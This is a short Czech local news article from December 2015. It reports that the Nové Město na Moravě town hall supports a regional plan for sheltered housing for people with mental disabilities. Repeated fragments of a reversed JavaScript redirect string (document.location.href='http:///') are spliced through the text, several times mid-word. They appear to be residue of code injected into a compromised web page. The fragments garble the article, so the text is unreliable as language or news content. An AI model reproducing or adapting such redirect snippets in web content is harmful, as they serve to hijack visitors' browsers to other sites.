Rainbow page separator

V Novém Městě vznikne chráněné bydlení pro postižené lidi

Neděle, 27. prosince 2015

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Vybudování chráněného bydlení, kde by mohli v rodinné atmosféře žít lidé s mentálním či kombinovaným onemocněním, podporují zástupci novoměstské radnice. S návrhem na vybudováním [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to typu bydlení přišel Kraj Vysočina. Dům by měl vzniknout v novoměstské ulici Malá.
Podobná zařízení již fungují v několika městech a obcích žďárského okresu, nejblíže k Novému Městu je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v Bystřici nad Pernštejnem. Tam byly loni postaveny dva malé domky, v nichž žije ve dvou domácnostech dvanáct klientů křižanovského ústavu.
Krajský program podpory transformace sociálních služeb osobám s lehčí formou postižení umožňuje žít podobný život, jako vedou zdraví lidé. Mohou s podporou ošetřujícího personálu žít v malých domácnostech, vykonávat běžné činnosti či pracovat například v chráněných dílnách.